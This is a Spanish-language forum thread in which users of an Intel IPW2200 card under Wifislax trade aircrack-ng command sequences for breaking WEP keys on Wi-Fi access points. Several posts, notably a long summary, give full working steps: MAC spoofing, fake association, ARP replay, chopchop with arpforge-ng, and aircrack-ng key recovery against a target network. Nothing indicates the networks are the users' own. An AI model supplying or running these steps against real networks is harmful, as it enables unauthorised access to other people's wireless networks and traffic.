|
|
*dudux
crustchaos
Moderador Global

|
 |
« Respuesta #121 en: 01-Marzo 20:27:09 (Jueves) » |
|
Hola a todos, antes de nada felicitaros por esta maravilla de web y de foro.
Supongo que como muchos habra alucinado con wifislax. Hace unos dias que me decidi a darle caña a la 2200 de intel y la verdad, todo fue de maravilla, pero el ataque 2 no me resulta, se queda leyendo paquetes, he visto en el video que sobre los 200 ya coge uno, pero en mi caso ni con 15.000.
Os dejo un resumen de los pasos que realizo, si veis alguno innecesario agradeceria me corrigieseis.
1º) airodump eth0 pruebas 0 1
Veo las conexiones y apunto los datos del objetivo, como BSSID , ESSID y el canal
2º) iwconfig eth0 mode monitor channel XX
Pongo la tarjeta en modo monitor en el canal adecuado, pero no lo he visto hacer en los videos.
3º) iwconfig eth0 essid "ap_objetivo" key 1234567890123
4º) airodump-ng -c canal_ap -b bssid_ap -w archivo.cap rtap0
CON CLIENTE CONECTADO (supongo ataque 3)
5º) aireplay-ng --ipwsys -3 -x 1024 -g 1000000 -b bssid -h cliente -i rtap0 eth0
SIN CLIENTE CONECTADO (ataque 2 según vi en el video)
5º) aireplay-ng –ipwsys -2 –t 1 –b bssid –c FF:FF:FF:FF:FF:FF –i rtap0 eth0
Este no lo entiendo muy bien ,las FF:FF son direccion mac del broadcast, que no se que es. Se queda leyendo paquetes.
Salu2.
yo lo que hay subrayado no lo hago....
|
|
|
|
|
|
./wireless_attack..........
|
|
|
|
|
|
|
|
|
*dudux
crustchaos
Moderador Global

|
 |
« Respuesta #125 en: 02-Marzo 11:49:39 (Viernes) » |
|
cuando ize el manual estaba el aircrack 0.8,,,,,,,,,,,,ahora uso el 1.1 claro esta.........no es por eso.................. tu respuesta en...... http://foro.seguridadwireless.net/index.php/topic,735.0.html
|
|
|
|
|
|
./wireless_attack..........
|
|
|
|
|
ertio

|
 |
« Respuesta #127 en: 02-Marzo 17:11:01 (Viernes) » |
|
Este resumen a ver si ayuda a algun poseedor de una IPW2200. Por supuesto estara lleno de errores, a ver si entre los que sepais mas ponemos hacer una guia o algo similar para los poseedores de ipw2200 que creo somos muchos.
RESUMEN DE ATAQUES CON IPW2200
Los 5 primeros pasos serian comunes para las opciones 1 y 2
1º) ifconfig eth0 up
2º) airodump eth0 pruebas 0 1
Veo las conexiones y apunto los datos del objetivo, como BSSID , ESSID y el canal.
Una vez apuntado los datos necesarios del ap, del cliente , etc, cerramos el proceso con CONTROL+Z
3º ) iwconfig “interface” rate 1M
limitamos el rate de nuestra tarjeta a 1 Mb por segundo. En interface ponemos rtap0 para ipw2200. Hay veces que no se podra.
4º) iwconfig eth0 essid "ap_objetivo" key 1234567890123 channel “canal”
Este seria el ataque 1. Me vinculo al ap con una key falsa “ap objetivo”--> nombre de la conexión objetivo “paco”, “WLAN”, etc… “canal”--> indicar el canal Puede haber veces que no nos deje.
5º) airodump-ng -c canal -b bssid -w archivo rtap0
Lo ejecuto en otra ventana y empiezo a capturar datos indicando el canal y la mac del objetivo
"canal"--> se sustituye por el canal "Bssid"-->se sustituye por la mac del objetivo Archivo --> nombre del archivo donde se guardan las capturas de datos
OPCION 1: CON CLIENTE CONECTADO (ataque 3)
6º) aireplay-ng --ipwsys -3 -x 1024 -g 1000000 -b bssid -h cliente -i rtap0 eth0
Inyecto trafico con el metodo de rh3nt0n. Con un cliente conectado. Este no se muy bien lo que hace, si captura paquetes del cliente y los manda al ap. Bssid-->se sustituye por la mac del objetivo Cliente--> se sustituye por la mac del cliente conectado a la web
OPCION 2:SIN CLIENTE CONECTADO (ataque 2) cliente falso
6º) aireplay-ng - - ipwsys -2 –t 1 –b bssid –c FF:FF:FF:FF:FF:FF –i rtap0 eth0
Se agradeceria algo de información.
ATAQUE CHOP CHOP: sin cliente conectado
--> ifconfig eth0 up hw ether 00:11:22:33:44:55
Con esto activamos la tarjeta y cambiamos la mac a 00:11:22:33:44:55
--> iwconfig eth0 essid “nombre del AP ” channel “canal” key 12345
Asi nos ponemos el nombre del AP y una clave cualquiera
--> airodump-ng - - ivs - - bssid “mac del AP” –w ataquechop rtap0
Comenzamos la captura indicando la mac del ap , capturando con rtap0 y guardando las capturas en el fichero ataquechop. Supongo que no hace falta poner la extension al indicar "- - ivs"
En otra ventana ponemos:
--> aireplay-ng –ipwsys -4 –a “mac AP” –h 11:22:33:44:55 –i rtap0 eth0
Cuando pregunte ¿use this packet ? le decimos Y. Cuando termine copiamos el nombre del archivo “replay_dec…..xor” para usarlo en el siguiente comando y forjar el ARP que reinyectaremos después.
--> arpforge-ng “replay_dec…..xor” 1 “mac del AP” 11:22:33:44:55 192.168.1.20 192.168.1.21 ficheroarp.cap
De esta forma usamos el fichero xor anterior para hacer el ARP que se reinyectara para aumentar los paquetes. “1” es el valor de FROMDS
--> aireplay-ng - - ipwsys -2 –r ficheroarp.cap eth0
Cuando pregunte ¿use this packet ? le decimos Y
--> aircrack–ng –n 64 ataquechop*.ivs
Probamos con -n 64 por si la clave es de 64 bits.
EL ATAQUE DE FRAGMENTACIÓN NO FUNCIONA EN IPW2200
Tampoco funcionaran los ataques si es un router cisco.
CAMBIAR MAC IPW2200:
--> Ifconfig eth0 up ether 00:11:22:33:44:55
En 00:11:22:33:44:55 --> mac deseada
La interfaz Rtap0 es la que se usa con airodump para capturar , especialmente configurado en wifislax 1.2 beta y la interfaz eth0 la usaremos con airoplay para inyectar.
Para comprobar si realmente tenemos una ipw2200 y no una 2100: --> dmesg | grep ipw2[/b]
Salu2.
|
|
|
|
« Última modificación: 07-Marzo 12:50:50 (Mircoles) por ertio »
|
|
|
|
|
|
|
|
|
|
|
|
|
patuchi

|
 |
« Respuesta #132 en: 20-Marzo 00:24:44 (Martes) » |
|
Como me puedo autenticar y asociar al ap  ?? algUien lo ha logrado con la ipw 2200BG  ? a mi me da el mensaje que con centrino NO se puede, que tiene que ver el procesador con la tarjeta que usemos  ?. No hay filtrado Mac, la señal es buena, y hay un cliente asociado....
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Waka

|
 |
« Respuesta #149 en: 21-Marzo 11:06:01 (Mircoles) » |
|
Eso es lo que dice cada uno, y yo te digo que sin cliente no inyectas por muy asociado que estes, que seguramente sea debido al ap puede ser,
Buenas, solo quería aportar que yo he conseguido reinyectar asociando un cliente falso, sin problemas con mi ipw2200, y he conseguido muchos arp's, de la forma que he leido en este hilo, no lo he conseguido nunca, yo lo hago de la siguiente manera, pongo el airodump a escanear, cuando ya tengo el objetivo, lo ajusto a ese AP y canal, me conecto al AP usando la herramienta wireles para conectarme que trae el wifi slax, y seguido lanzo el atake 3, en no menos de 2 minutos empieza a reinyectar, quizas no sea el método correcto pero asi es como consigo hacerlo, si intento un atake 1 con comandos no hace nada de nada. salu2
|
|
|
|
|
|
|
|
|
chilli33

|
 |
« Respuesta #150 en: 22-Marzo 00:34:42 (Jueves) » |
|
Aqui tienes todo el soft q necesitas ... lo q realmente se necesita saber es la tarjeta q lleba intregrada ....  HP PRO/Wireless 2200BG 3B Network Connection Tambien lleva una ethernet realtek RTL8139 PCI Fast Ethernet Adapter a,b,c si alguien puede ayudar por favor...
|
|
|
|
|
|
|
|
|
|
|
|